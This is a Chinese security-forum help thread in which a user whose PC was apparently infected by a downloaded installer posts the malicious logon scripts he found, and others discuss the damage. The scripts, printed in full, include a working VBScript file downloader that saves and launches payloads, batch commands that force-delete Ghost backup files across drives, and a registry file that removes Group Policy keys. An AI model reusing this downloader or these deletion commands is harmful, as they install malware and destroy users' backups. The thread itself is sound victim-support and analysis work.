用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

中招我不怕,主要不甘心在提示100%没发现病毒提示下安装的,我是在几天后无意中发现进程老是cmd.exe和conime.exe同时存在,有找不到cmd.exe启动的原因,在朋友提示下找到登录脚本才发现的,现在只希望知道他下载了什么,安装了什么,还驻留了什么?删的东西是什么?我还是在华军软件圆下载的,下载地址h t t p://jsnetcom.onlinedown.com/down/zrswp3_newhua_x8z.zip,前面http加了空格,没一定功夫勿去下哈

把那几个bat、vbs、reg文件压缩传上来，我看看……

未必中毒。一些ghost系统一般都附赠一些小工具，这些文件估计也是ghost系统附赠工具的一部分，比如说那个donw.vbs（可能是快速关机脚本文件，不过文件名好像弄错了）、shijian.vbs（可能与系统时间调整有关）等。

3.bat
@Echo Off
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
regedit.exe/s %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\winrp.reg
sys.bat
@Echo Off
Del %0
ssys.bat
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping www.google.com &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs
Exit
:End
ping  &&Goto ok
Goto End
yici.bat
@Echo Off
md "%SystemRoot%\ehome"
ping  &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\cacls1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  %SystemRoot%\ehome\ca.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\ehome\cacls.vbs
Del %0
:End
ping www.google.com &&Goto ok
Goto End
notepa.bat
@Echo Off
Del /f/s/q %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\sys.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
rename %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\ssys.bat sys.bat
:Next
Del /f/s/q d:\*.GHO
Del /f/s/q e:\*.GHO
Del /f/s/q f:\*.GHO
Del /f/s/q g:\*.GHO
Del /f/s/q h:\*.GHO
Del /f/s/q i:\*.GHO
Del /f/s/q j:\*.GHO
Del /f/s/q k:\*.GHO
Del /f/s/q %SystemRoot%\Logon\sys.bat
Del /f/s/q %SystemRoot%\Logon\shijian.vbs
Del /f/s/q %SystemRoot%\Logon\index.vbs
rd 2 /s/q %SystemRoot%\GroupPolicy
Del /f/s/q %SystemRoot%\system32\GroupPolicy\33.vbs
Del /f/s/q %SystemRoot%\system32\GroupPolicy\2.bat
dEL %0

donw.vbs

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
wscript.sleep 1
sGet.SaveToFile iLocal,1

shijian.vbs
Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000

winrp.reg
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy]

明显去下了几个文件.又删出了不少,但我在他下载的目录中没找到下载的文件,他自己删出了吗?还是没下载安装上?

打酱油的跑了啊

我倒，这些文件是大杀器啊，不仅强行删除组策略注册表项，还强行删除GHOST备份文件，歹毒至极……

如果不重装系统，修复工作会相当麻烦……

能告诉你们工程师测试下他下载安装什么的吗?我可是2006年注册用户

请把c:\windows\ehome这个文件夹整个用WINRAR压缩打包，提交压缩包至“可疑文件交流区”鉴定。

你的系统已严重受损，组策略不能用了，上面那些链接的网址可能是是flash木马，我要处理下你的帖子先。

请楼主把4楼的文件也压缩发至“可疑文件交流区”，我在处理链接时出错了，错删了网马地址……